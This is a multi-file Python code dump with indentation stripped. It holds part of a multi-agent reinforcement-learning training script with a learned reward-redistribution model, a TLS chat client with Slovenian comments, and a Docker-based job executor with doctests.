parser.add_argument('--fixed_lr', default=False, action='store_true')
parser.add_argument('--num_eval_runs', type=int, default=1000, help='number of runs per evaluation (default: 5)')
parser.add_argument("--exp_name", type=str, help="name of the experiment")
parser.add_argument("--save_dir", type=str, default=save_model_path,
help="directory in which training state and model should be saved")
parser.add_argument('--static_env', default=False, action='store_true')
parser.add_argument('--critic_type', type=str, default='mlp', help="Supports [mlp, gcn_mean, gcn_max]")
parser.add_argument('--actor_type', type=str, default='mlp', help="Supports [mlp, gcn_max]")
parser.add_argument('--critic_dec_cen', default='cen')
parser.add_argument("--env_agent_ckpt", type=str, default='ckpt_plot/simple_tag_v5_al0a10_4/agents.ckpt')
parser.add_argument('--shuffle', default=None, type=str, help='None|shuffle|sort')
parser.add_argument('--episode_per_update', type=int, default=4, metavar='N',
help='max episode length (default: 1000)')
parser.add_argument('--episode_per_actor_update', type=int, default=4)
parser.add_argument('--episode_per_critic_update', type=int, default=4)
parser.add_argument('--steps_per_actor_update', type=int, default=100)
parser.add_argument('--steps_per_critic_update', type=int, default=100)
#parser.add_argument('--episodes_per_update', type=int, default=4)
parser.add_argument('--target_update_mode', default='soft', help='soft | hard | episodic')
parser.add_argument('--cuda', default=False, action='store_true')
parser.add_argument('--eval_freq', type=int, default=1000)
args = parser.parse_args()
if args.exp_name is None:
args.exp_name = args.scenario + '_' + args.critic_type + '_' + args.target_update_mode + '_hiddensize' \
+ str(args.hidden_size) + '_' + str(args.seed)
print("=================Arguments==================")
for k, v in args.__dict__.items():
print('{}: {}'.format(k, v))
print("========================================")
torch.set_num_threads(1)
device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
env = make_env(args.scenario, None)
n_agents = env.n
env.seed(args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
num_adversary = 0
n_actions = n_actions(env.action_space)
obs_dims = [env.observation_space[i].shape[0] for i in range(n_agents)]
obs_dims.insert(0, 0)
if 'hetero' in args.scenario:
import multiagent.scenarios as scenarios
groups = scenarios.load(args.scenario + ".py").Scenario().group
agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device, groups=groups)
eval_agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu', groups=groups)
else:
agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device)
eval_agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu')
memory = ReplayMemory(args.replay_size)
memory_e = ReplayMemory_episode(int(args.replay_size/args.num_steps))
feat_dims = []
for i in range(n_agents):
feat_dims.append(env.observation_space[i].shape[0])
# Find main agents index
unique_dims = list(set(feat_dims))
agents0 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[0]]
if len(unique_dims) > 1:
agents1 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[1]]
main_agents = agents0 if len(agents0) >= len(agents1) else agents1
else:
main_agents = agents0
rewards = []
total_numsteps = 0
updates = 0
exp_save_dir = os.path.join(args.save_dir, args.exp_name)
os.makedirs(exp_save_dir, exist_ok=True)
best_eval_reward, best_good_eval_reward, best_adversary_eval_reward = -1000000000, -1000000000, -1000000000
start_time = time.time()
value_loss, policy_loss = 0.0, 0.0
copy_actor_policy(agent, eval_agent)
torch.save({'agents': eval_agent}, os.path.join(exp_save_dir, 'agents_best.ckpt'))
# for mp test
test_q = Queue()
done_training = Value('i', False)
p = mp.Process(target=eval_model_q, args=(test_q, done_training, args))
p.start()
####################################################
Transition_e = namedtuple(
'Transition_episode', ('states', 'actions', 'masks', 'next_states', 'rewards'))
use_agent_attention = False
use_rudder = False
def sample_trajectory(memory, n_trajectories=128, use_agent_attention=False, use_rudder=False):
sample_traj = random.sample(memory, n_trajectories)
samples = Transition_e(*zip(*sample_traj))
next_states = np.array(list(samples.next_states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
states = np.array(list(samples.states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
all_states = np.concatenate((states[:,:,0,:][:,:,np.newaxis,:], next_states), axis=2)
rewards = np.array(list(samples.rewards)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
episode_reward = np.sum(np.squeeze(rewards[:,0,:,:],axis=2), axis=1)
episode_time_reward = np.squeeze(rewards[:,0,:,:],axis=2)
x_train_tensor = torch.from_numpy(next_states).float().contiguous()
xall_train_tensor = torch.from_numpy(all_states).float().contiguous()
y_train_tensor = torch.from_numpy(episode_reward).float().contiguous()
episode_time_reward_tensor = torch.from_numpy(episode_time_reward).float().contiguous()
if use_agent_attention:
return x_train_tensor, y_train_tensor, episode_time_reward_tensor
elif use_rudder:
return xall_train_tensor.transpose(1,2).contiguous().view(n_trajectories, args.num_steps+1, -1), y_train_tensor, episode_time_reward_tensor
else:
return x_train_tensor.transpose(1,2).contiguous().view(n_trajectories, args.num_steps, -1), y_train_tensor, episode_time_reward_tensor
def sample_and_pred(memory, model, batch_size, n_agents, n_trajectories=128,
use_agent_attention=False, use_rudder=False):
sample_traj = random.sample(memory, n_trajectories)
samples = Transition_e(*zip(*sample_traj))
next_states = np.array(list(samples.next_states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
# Construct inputs
if not use_agent_attention:
if use_rudder:
states = np.array(list(samples.states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
all_states = np.concatenate((states[:,:,0,:][:,:,np.newaxis,:], next_states), axis=2)
x_train_tensor = torch.from_numpy(all_states).float().transpose(1,2).contiguous().view(n_trajectories, args.num_steps+1, -1)
hidden = model.init_hidden(n_trajectories)
else:
x_train_tensor = torch.from_numpy(next_states).float().transpose(1,2).contiguous().view(n_trajectories, args.num_steps, -1)
else:
x_train_tensor = torch.from_numpy(next_states).float().contiguous()
# Predit rewards
if use_rudder:
_, y_time_hat = model(x_train_tensor.to(device), hidden)
else:
_, y_time_hat = model(x_train_tensor.to(device))
pred_rewards = np.repeat(y_time_hat.detach().cpu().numpy()[:,:,np.newaxis], n_agents, axis=2)
# Randomly sample (s,a,r,s')
ind1 = np.arange(n_trajectories)
ind2 = np.random.randint(args.num_steps, size=(n_trajectories, int(batch_size/n_trajectories)))
states = np.array(samples.states)[ind1[:,None], ind2].reshape(batch_size,-1)
actions = np.array(samples.actions)[ind1[:,None], ind2].reshape(batch_size,-1)
masks = np.array(samples.masks)[ind1[:,None], ind2].reshape(batch_size,-1)
next_states = np.array(samples.next_states)[ind1[:,None], ind2].reshape(batch_size,-1)
rewards = pred_rewards[ind1[:,None], ind2].reshape(batch_size,-1)
return Transition(states, actions, masks, next_states, rewards)
class LstmPredNet(nn.Module):
def __init__(self, embedding_dim, hidden_dim, n_layers, drop_prob=0.0):
super(LstmPredNet, self).__init__()
self.n_layers = n_layers
self.hidden_dim = hidden_dim
self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=drop_prob, batch_first=True)
self.dropout = nn.Dropout(drop_prob)
self.fc = nn.Linear(hidden_dim, 1)
def forward(self, x, hidden):
batch_size, t, e = x.size()
lstm_out, hidden = self.lstm(x, hidden)
lstm_out = lstm_out.contiguous().view(-1, self.hidden_dim)
out = self.dropout(lstm_out)
out = self.fc(out)
out = out.view(batch_size, -1)
final = out[:,-1]
step_reward = out[:,1:] - out[:,0:-1]
return final, step_reward
def init_hidden(self, batch_size):
weight = next(self.parameters()).data
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().to(device),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().to(device))
return hidden
time_length, state_emb = args.num_steps, obs_dims[-1]
n_heads = 6
depth = 3
if use_agent_attention:
reward_model = former.Time_Agent_Transformer(emb=state_emb, heads=n_heads,
depth=depth, seq_length=time_length,
n_agents=n_agents, agent=True, dropout=0.0)
elif use_rudder:
reward_model = LstmPredNet(embedding_dim=n_agents*state_emb, hidden_dim=512, n_layers=2)
else:
reward_model = former.Time_Transformer(emb=n_agents*state_emb, heads=n_heads,
depth=depth, seq_length=time_length,
n_agents=n_agents, dropout=0.0)
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
reward_model = nn.DataParallel(reward_model)
if torch.cuda.is_available():
reward_model.cuda()
# model(x.to(device))
opt = torch.optim.Adam(lr=0.0001, params=reward_model.parameters(), weight_decay=1e-5)
loss_fn = nn.MSELoss(reduction='mean')
def make_train_step(model, loss_fn, optimizer, use_rudder=False):
# Builds function that performs a step in the train loop
def train_step(x, y, z):
# Sets model to TRAIN mode
model.train()
if use_rudder:
batch_size, _, _ = x.size()
hidden = model.init_hidden(batch_size)
yhat, y_time_hat = model(x, hidden)
# Makes predictions
else:
yhat, y_time_hat = model(x)
# Computes loss
loss = loss_fn(y, yhat)
loss_2 = loss_fn(z, y_time_hat)
loss_total = loss + 20*torch.mean(torch.var(y_time_hat, dim=1))
# Computes gradients
loss_total.backward()
# loss.backward()
# Updates parameters and zeroes gradients
optimizer.step()
optimizer.zero_grad()
# Returns the loss
return loss.item(), loss_2.item()
# Returns the function that will be called inside the train loop
return train_step
# Creates the train_step function for our model, loss function and optimizer
train_step = make_train_step(reward_model, loss_fn, opt, use_rudder=use_rudder)
from torch.utils.tensorboard import SummaryWriter
# default `log_dir` is "runs" - we'll be more specific here
writer = SummaryWriter(tensorboard_path)
####################################################
for i_episode in range(args.num_episodes):
obs_n = env.reset()
episode_reward = 0
episode_step = 0
agents_rew = [[] for _ in range(n_agents)]
x_e, action_e, mask_e, x_next_e, reward_e = [], [], [], [], []
while True:
# action_n_1 = [agent.select_action(torch.Tensor([obs]).to(device), action_noise=True, param_noise=False).squeeze().cpu().numpy() for obs in obs_n]
action_n = agent.select_action(torch.Tensor(obs_n).to(device), action_noise=True,
param_noise=False).squeeze().cpu().numpy()
next_obs_n, reward_n, done_n, info = env.step(action_n)
total_numsteps += 1
episode_step += 1
terminal = (episode_step >= args.num_steps)
action = torch.Tensor(action_n).view(1, -1)
mask = torch.Tensor([[not done for done in done_n]])
next_x = torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1)
episode_reward += np.sum(reward_n)
# if done_n[0] or terminal:
# reward = torch.Tensor([[episode_reward/(n_agents*25)]*n_agents])
# else:
# reward = torch.Tensor([[0.0]*n_agents])
# reward = torch.Tensor([reward_n])
# x = torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1)
# memory.push(x, action, mask, next_x, reward)
x_e.append(np.concatenate(obs_n, axis=0).reshape(1,-1))
action_e.append(action_n.reshape(1,-1))
mask_e.append(np.array([[not done for done in done_n]]))
x_next_e.append(np.concatenate(next_obs_n, axis=0).reshape(1,-1))
reward_e.append(np.array([reward_n]))
# x_e.append(torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1))
# action_e.append(torch.Tensor(action_n).view(1, -1))
# mask_e.append(torch.Tensor([[not done for done in done_n]]))
# x_next_e.append(torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1))
# reward_e.append(torch.Tensor([reward_n]))
# print(obs_n[0].shape, len(obs_n))
for i, r in enumerate(reward_n):
agents_rew[i].append(r)
obs_n = next_obs_n
n_update_iter = 5
# if len(memory) > args.batch_size:
if len(memory_e) > args.batch_size * 5:
# if len(memory_e)*4 >= args.batch_size:
################################################
if total_numsteps % args.steps_per_actor_update == 0:
for _ in range(args.updates_per_step):
# transitions = memory.sample(args.batch_size)
# batch = Transition(*zip(*transitions))
# batch = memory_e.sample(args.batch_size)
batch = sample_and_pred(memory_e.memory, reward_model,
args.batch_size, n_agents,
n_trajectories=256, use_agent_attention=use_agent_attention,
use_rudder= use_rudder)
# print(batch.reward.shape)
policy_loss = agent.update_actor_parameters(batch, i, args.shuffle)
updates += 1
print('episode {}, p loss {}, p_lr {}'.
format(i_episode, policy_loss, agent.actor_lr))
if total_numsteps % args.steps_per_critic_update == 0:
value_losses = []
for _ in range(args.critic_updates_per_step):
# transitions = memory.sample(args.batch_size)
# batch = Transition(*zip(*transitions))
# batch = memory_e.sample(args.batch_size)
batch = sample_and_pred(memory_e.memory, reward_model,
args.batch_size, n_agents,
n_trajectories=256, use_agent_attention=use_agent_attention,
use_rudder= use_rudder)
value_losses.append(agent.update_critic_parameters(batch, i, args.shuffle)[0])
updates += 1
# print(value_losses)
value_loss = np.mean(value_losses)
print('episode {}, q loss {}, q_lr {}'.
format(i_episode, value_loss, agent.critic_optim.param_groups[0]['lr']))
if args.target_update_mode == 'episodic':
hard_update(agent.critic_target, agent.critic)
if done_n[0] or terminal:
print('train epidoe reward', episode_reward, ' episode ', i_episode)
episode_step = 0
memory_e.push(x_e, action_e, mask_e, x_next_e, reward_e)
x_e, action_e, mask_e, x_next_e, reward_e = [], [], [], [], []
break
# print(len(memory_e))
# if len(memory_e)==12000:
# with open('trajectories3.pickle', 'wb') as handle:
# pickle.dump(memory_e, handle, protocol=pickle.HIGHEST_PROTOCOL)
################################################
# train the reward redistribution model
# if i_episode % 1000 == 0 or (len(memory_e) == args.batch_size * 5):
if (i_episode+1) % 1000 == 0 and (len(memory_e)>4000):
epoch_train_episode_reward_loss = []
epoch_train_step_reward_loss = []
for ii in range(1000):
x_batch, y_batch, z_batch = sample_trajectory(memory_e.memory, n_trajectories=128,
use_agent_attention=use_agent_attention,
use_rudder=use_rudder)
x_batch = x_batch.to(device)
y_batch = y_batch.to(device)
z_batch = z_batch.to(device)
loss, loss_2 = train_step(x_batch, y_batch, z_batch)
epoch_train_episode_reward_loss.append(loss)
epoch_train_step_reward_loss.append(loss_2)
writer.add_scalar(args.exp_name + f'_episode_reward_loss', np.mean(epoch_train_episode_reward_loss), i_episode)
writer.add_scalar(args.exp_name + f'_step_reward_loss', np.mean(epoch_train_step_reward_loss), i_episode)
if not args.fixed_lr:
agent.adjust_lr(i_episode)
writer.add_scalar(args.exp_name + f'_episode_reward', episode_reward, i_episode)
rewards.append(episode_reward)
# if (i_episode + 1) % 1000 == 0 or ((i_episode + 1) >= args.num_episodes - 50 and (i_episode + 1) % 4 == 0):
if (i_episode + 1) % args.eval_freq == 0:
tr_log = {'num_adversary': 0,
'best_good_eval_reward': best_good_eval_reward,
'best_adversary_eval_reward': best_adversary_eval_reward,
'exp_save_dir': exp_save_dir, 'total_numsteps': total_numsteps,
'value_loss': value_loss, 'policy_loss': policy_loss,
'i_episode': i_episode, 'start_time': start_time}
copy_actor_policy(agent, eval_agent)
test_q.put([eval_agent, tr_log])
env.close()
time.sleep(5)
done_training.value = True
|
chatClient.py
|
import socket
import struct
import sys
import threading
import msgpack # python -m pip install msgpack
import ssl
PORT = 10139
HEADER_LENGTH = 2
atos = lambda address: f'[{address[0]}:{address[1]}]'
def setup_SSL_context(cert: str, key: str, CA: str):
#uporabi samo TLS, ne SSL
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# certifikat je obvezen
context.verify_mode = ssl.CERT_REQUIRED
#nalozi svoje certifikate
context.load_cert_chain(certfile=cert, keyfile=key)
# nalozi certifikate CAjev (samopodp. cert.= svoja CA!)
context.load_verify_locations(CA)
# nastavi SSL CipherSuites (nacin kriptiranja)
context.set_ciphers('ECDHE-RSA-AES128-GCM-SHA256')
return context
def receive_fixed_length_msg(sock: socket.socket, msglen: int):
message = b''
while len(message) < msglen:
chunk = sock.recv(msglen - len(message)) # preberi nekaj bajtov
if chunk == b'':
raise RuntimeError("socket connection broken")
message = message + chunk # pripni prebrane bajte sporocilu
return message
def receive_message(sock: socket.socket):
header = receive_fixed_length_msg(sock,
HEADER_LENGTH) # preberi glavo sporocila (v prvih 2 bytih je dolzina sporocila)
# pretvori dolzino sporocila v int
message_length = struct.unpack("!H", header)[0]
message = None
if message_length > 0: # ce je vse OK
message = receive_fixed_length_msg(
sock, message_length) # preberi sporocilo
message = message.decode("utf-8")
return message
def send_message(sock: socket.socket, message: str):
# pretvori sporocilo v niz bajtov, uporabi UTF-8 kodno tabelo
encoded_message = message.encode("utf-8")
# ustvari glavo v prvih 2 bytih je dolzina sporocila (HEADER_LENGTH)
# metoda pack "!H" : !=network byte order, H=unsigned short
header = struct.pack("!H", len(encoded_message))
# najprj posljemo dolzino sporocilo, slee nato sporocilo samo
message = header + encoded_message
sock.sendall(message)
def send_pack(sock: socket.socket, o: dict):
msg = msgpack.packb(o)
header = struct.pack("!H", len(msg))
message = header + msg
sock.sendall(message)
def read_pack(sock: socket.socket):
header = receive_fixed_length_msg(sock,HEADER_LENGTH)
message_length = struct.unpack("!H", header)[0]
message = None
if message_length > 0:
message = receive_fixed_length_msg(sock, message_length)
message = msgpack.unpackb(message)
return message
if __name__ == '__main__':
# message_receiver funkcija tece v loceni niti
def message_receiver():
while True:
try:
if msg_received := read_pack(sock): # ce obstaja sporocilo
if msg_received['type'] == 'msg':
print(f"[{msg_received['from']}] : {msg_received['msg']}") # izpisi
elif msg_received['type'] == 'msg-dm':
print(f"[* {msg_received['from']}] : {msg_received['msg']}") # izpisi
elif msg_received['type'] == 'status':
print(f"!{msg_received['for']} : {msg_received['status']}") # izpisi
else:
print(msg_received)
except ConnectionResetError:
print("[system] Connection reset by peer!")
sys.exit()
target_addr = 'localhost'
if addr := input(f'[system] Target chat server [{target_addr}]: '):
target_addr = addr
cert = 'cert/elektron.crt'
if new_cert := input(f'[system] Certificate [{cert}]: '):
cert = new_cert
key = 'cert/elektron.key'
if new_key := input(f'[system] Key [{key}]: '):
key = new_key
ca = 'cert/streznik.crt'
if new_ca := input(f'[system] Verify location [{ca}]: '):
ca = new_ca
ctx = setup_SSL_context(cert, key, ca)
# povezi se na streznik
print("[system] Connecting to chat server ...")
sock = ctx.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
sock.connect((target_addr, PORT))
except ConnectionRefusedError:
print("[system] Cannot connect to server!")
sys.exit()
print("[system] Connected!")
# zazeni message_receiver funkcijo v loceni niti
thread = threading.Thread(target=message_receiver)
thread.daemon = True
thread.start()
# pocakaj da uporabnik nekaj natipka in poslji na streznik
while sock.fileno() != -1:
try:
if msg_send := input(f""):
for_ = ''
if msg_send.startswith('/w'):
try:
_, for_, msg_send = msg_send.split(' ', 2)
except ValueError:
print('Usage: /w [user] [message...]')
continue
send_pack(sock, {"type": "msg", "msg" : msg_send, "for" : for_})
except KeyboardInterrupt:
sys.exit()
|
executor.py
|
import os
import json
import time
import shlex
import socket
import shutil
import random
import subprocess
from threading import Thread
import docker
from kwikapi import Client
from basescript import BaseScript
from deeputil import AttrDict, Dummy, keeprunning
class Executor:
# State of the executor that it is ready for executing a job.
WREADY = "ready"
# State of the executor that it is executing a job
WBUSY = "busy"
# Executor should always ask job from master at some interval
JOB_INTERVAL = 10
def __init__(
self,
url=None,
version=None,
protocol=None,
hostname=None,
external_inp_dir=None,
external_out_dir=None,
external_work_dir=None,
log=Dummy(),
):
super().__init__()
self.job_id = None
self.master = Client(url=url, version=version, protocol=protocol)
self.remote_inp_dir = external_inp_dir
self.remote_out_dir = external_out_dir
self.remote_work_dir = external_work_dir
self.hostname = hostname
# FIXME:no hard coding for this
self.docker_tmp_dir = "/tmp/"
self.state = self.WREADY
self.progress = 0
self.docker_client = None
self.container_id = None
self.job_state = None
self.container_stdout = None
self.container_stderr = None
self.log_dir = None
self._state_daemon()
self._progress_daemon()
self._get_job_state_daemon()
self._handle_job_operations_daemon()
self._get_container_stdout_daemon()
self._get_container_stderr_daemon()
self._write_stdout_stderr_daemon()
self.log = log
@keeprunning()
def run(self):
"""
The executor need to keeprunning and requesting for job.
If a job is received from master machine it should execute it.
"""
response = self.request_job()
params = self.process_response(response)
self.process_params(params)
def request_job(self):
"""
The executor will request for a job and,
try to receive and process the response from the master.
"""
time.sleep(self.JOB_INTERVAL)
self.log.info("request_job")
job_response = self.master.worker.get_job(name=self.hostname)
return job_response
def process_response(self, response):
"""
After receiving a response from master machine,
the response has to be processed in a valid format.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> e.state
'ready'
>>> response = None
>>> e.process_response(response)
>>> e.state
'ready'
>>> params = json.dumps({"external":
... {"input":"external_input",
... "output":"external_output",
... "workdir":"external_workdir"},
... "docker":
... {"image":"image",
... "input":"internal_input",
... "arguments":"arguments",
... "output":"internal_output",
... "workdir":"internal_workdir"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(response)
{'id': 'id',
'name': 'name',
'parameters': '{"external": {"input": "external_input", "workdir": '
'"external_workdir", "output": "external_output"}, "docker": '
'{"input": "internal_input", "image": "image", "arguments": '
'"arguments", "workdir": "internal_workdir", "output": '
'"internal_output"}}',
'preserve': 'preserve'}
>>> pprint(e.process_response(response))
{'arguments': 'arguments',
'docker_cred': '',
'docker_inp_dir': 'internal_input',
'docker_out_dir': 'internal_output',
'docker_work_dir': 'internal_workdir',
'environment': {},
'image_name': 'image',
'job_id': 'id',
'job_name': 'name',
'preserve': 'preserve',
'remote_inp_dir': 'external_input',
'remote_out_dir': 'external_output',
'remote_work_dir': 'external_workdir'}
>>> e.state
'busy'
"""
if not response:
self.log.info("no_job", worker_state=self.state)
else:
self.log.info("job_received", worker_state=self.state)
params = self._get_parameters(response)
self.state = self.WBUSY
return params
def _get_parameters(self, response):
"""
The job paramters have to be extracted out from the response.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> params = json.dumps({"external":{},
... "docker":
... {"image":"image",
... "input":"input",
... "arguments":"arguments",
... "output":"output"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(response)
{'id': 'id',
'name': 'name',
'parameters': '{"external": {}, "docker": {"input": "input", "image": '
'"image", "arguments": "arguments", "output": "output"}}',
'preserve': 'preserve'}
>>> response.get('id')
'id'
>>> response.get('name')
'name'
>>> response.get('preserve')
'preserve'
>>> pprint(response.get('parameters'))
('{"external": {}, "docker": {"input": "input", "image": "image", "arguments": '
'"arguments", "output": "output"}}')
>>> json.loads(response.get('parameters'))['external']
{}
>>> pprint(json.loads(response.get('parameters'))['docker'])
{'arguments': 'arguments',
'image': 'image',
'input': 'input',
'output': 'output'}
>>> params = json.dumps({"external":
... {"input":"external_input",
... "output":"external_output",
... "workdir":"external_workdir"},
... "docker":
... {"image":"image",
... "input":"internal_input",
... "arguments":"arguments",
... "output":"internal_output",
... "workdir":"internal_workdir"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(e._get_parameters(response))
{'arguments': 'arguments',
'docker_cred': '',
'docker_inp_dir': 'internal_input',
'docker_out_dir': 'internal_output',
'docker_work_dir': 'internal_workdir',
'environment': {},
'image_name': 'image',
'job_id': 'id',
'job_name': 'name',
'preserve': 'preserve',
'remote_inp_dir': 'external_input',
'remote_out_dir': 'external_output',
'remote_work_dir': 'external_workdir'}
>>>
"""
self.log.info("_handle_params", response=response)
self.job_id = job_id = response.get("id", "")
job_name = response.get("name", "")
preserve = response.get("preserve", "")
external = json.loads(response["parameters"])["external"]
external_inp_dir = external.get("input", self.remote_inp_dir)
external_out_dir = external.get("output", self.remote_out_dir)
external_work_dir = external.get("workdir", self.remote_work_dir)
docker_params = json.loads(response["parameters"])["docker"]
docker_inp_dir = docker_params.get("input", "")
docker_out_dir = docker_params.get("output", "")
docker_work_dir = docker_params.get("workdir", "")
image_name = docker_params.get("image", "")
docker_cred = docker_params.get("credentials", "")
docker_env = docker_params.get("envs", {})
docker_args = docker_params.get("arguments", "")
# FIXME: docker arguments should also contain job_id if some process requires it.
# FIXME: find a better way to implement it.
params = {
"job_id": job_id,
"job_name": job_name,
"preserve": preserve,
"docker_inp_dir": docker_inp_dir,
"docker_out_dir": docker_out_dir,
"docker_work_dir": docker_work_dir,
"image_name": image_name,
"preserve": preserve,
"remote_inp_dir": external_inp_dir,
"remote_out_dir": external_out_dir,
"remote_work_dir": external_work_dir,
"docker_cred": docker_cred,
"environment": docker_env,
"arguments": docker_args,
}
return AttrDict(params)
def _construct_docker_cmd(self, p):
"""
Docker image is your actual job, now in order to execute the docker,
docker command has to be constructed in order to execute it.
Based on the job paramters docker command will be constructed.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> params = {'arguments': 'arguments',
... 'docker_cred': '',
... 'docker_inp_dir': 'internal_input',
... 'docker_out_dir': 'internal_output',
... 'docker_work_dir': 'internal_workdir',
... 'environment': {},
... 'image_name': 'image',
... 'job_id': 'id',
... 'job_name': 'name',
... 'preserve': 'preserve',
... 'remote_inp_dir': 'external_input',
... 'remote_out_dir': 'external_output',
... 'remote_work_dir': 'external_workdir'}
>>> params_dict = AttrDict(params)
>>> image, volumes, argument, tmp_dir = e._construct_docker_cmd(params_dict)
>>> image
'image'
>>> pprint(volumes)
{'external_input': {'bind': 'internal_input', 'mode': 'rw'},
'external_output': {'bind': 'internal_output', 'mode': 'rw'},
'external_workdir': {'bind': 'internal_workdir', 'mode': 'rw'}}
>>> argument
'arguments'
>>> # Doctest end, clearing noise
>>> shutil.rmtree(tmp_dir)
>>> os.path.exists(tmp_dir)
False
"""
self.log_dir = self._create_log_dir(p.remote_out_dir, self.job_id)
tmp_dir = self._make_tmpdir(p, self.job_id)
volumes = {
p.remote_inp_dir: {"bind": p.docker_inp_dir, "mode": "rw"},
p.remote_out_dir: {"bind": p.docker_out_dir, "mode": "rw"},
p.remote_work_dir: {"bind": p.docker_work_dir, "mode": "rw"},
}
return p.image_name, volumes, p.arguments, tmp_dir
def process_params(self, params):
"""
After the paramters are extracted they need to be processed further,
so that the actual execution of the job can be done.
>>> from executor import Executor
>>> e = Executor()
>>> try:
... e.process_params()
... except:
... print('Params Required')
...
Params Required
"""
image, volumes, docker_cmd, tmp_dir = self._construct_docker_cmd(params)
self.run_docker(
params.docker_cred, image, params.environment, volumes, docker_cmd
)
self._preserve_tmp_data(params.preserve, tmp_dir, params.remote_out_dir)
def _docker_login(self, credentials):
"""
If you have a privately owned docker image it need to be pulled.
For pulling your image from docker hub a login is required.
You need to provide docker hub login credentials for that.
>>> from executor import Executor
>>> e = Executor()
>>> credentials = None
>>> e._docker_login(credentials)
"""
if credentials:
self.docker_client = docker.from_env()
self.docker_client.login(
username=credentials.username, password=credentials.password
)
def run_docker(self, cred, image, env, volumes, cmd):
"""
Docker image needs to be executed after image is successfully pulled,
and docker command is contructed based on the job parameters.
"""
self.log.info("run_docker", state=self.state)
self._docker_login(cred)
self.docker_client = docker.from_env()
self.container_id = self.docker_client.containers.run(
image,
environment=env,
volumes=volumes,
command=cmd,
stderr=True,
detach=True,
)
self.container_id.wait()
self.log.info("Stopping container")
self.container_id.stop()
self.log.info("container_stopped")
self.container_id.remove()
self.container_id = None
self.log.info("container_removed")
self.state = self.WREADY
self.log.info("docker_done", worker_state=self.state)
@keeprunning()
def _get_container_stdout(self):
if self.container_id:
self.container_stdout = self.container_id.logs(
stdout=True, stderr=False
).decode("utf-8", "ignore")
def _get_container_stdout_daemon(self):
stdout = Thread(target=self._get_container_stdout)
stdout.daemon = True
stdout.start()
return stdout
@keeprunning()
def _get_container_stderr(self):
if self.container_id:
self.container_stderr = self.container_id.logs(
stdout=False, stderr=True
).decode("utf-8", "ignore")
def _get_container_stderr_daemon(self):
stderr = Thread(target=self._get_container_stderr)
stderr.daemon = True
stderr.start()
return stderr
@keeprunning()
def _write_stdout_stderr(self):
if self.container_id:
stdout_f = open(os.path.join(self.log_dir, "stdout"), "w+")
stderr_f = open(os.path.join(self.log_dir, "stderr"), "w+")
if self.container_stdout:
stdout_f.write(self.container_stdout)
if self.container_stderr:
stderr_f.write(self.container_stderr)
def _write_stdout_stderr_daemon(self):
write = Thread(target=self._write_stdout_stderr)
write.daemon = True
write.start()
return write
def _create_log_dir(self, out_dir, job_id):
log_dir = os.path.join(out_dir, "logs", repr(job_id))
if not os.path.exists(log_dir):
os.makedirs(log_dir)
return log_dir
def _get_job_state_daemon(self):
"""
As the job is being executed their may be chances that state of job is
changed to following:
pause
restart
cancel
In these cases it is important to always get the state of the job so that
operations can be performed
>>> from executor import Executor
>>> e = Executor()
>>> th = e._get_job_state_daemon()
>>> th.isDaemon()
True
>>> th.is_alive()
True
"""
job_state = Thread(target=self._get_job_state)
job_state.daemon = True
job_state.start()
return job_state
@keeprunning()
def _get_job_state(self):
"""
Responsible for continuously getting the state of the job which is being executed
"""
self.job_state = self.master.worker.get_job_state(job_id=self.job_id)
@keeprunning()
def _handle_job_operations(self):
"""
Once the docker container has been started,
there can be external operations like, pause, restart, cancel;
which should be handled.
"""
if self.job_state == "paused":
self.container_id.pause()
if self.job_state == "resumed":
self.container_id.unpause()
if self.job_state == "cancelled":
# self.log.info('STOOOOOOOOOOOOPIN')
self.container_id.kill()
# self.log.info('STOPPPPPPPPPPPPPPPDDDDDDDDDD')
def _handle_job_operations_daemon(self):
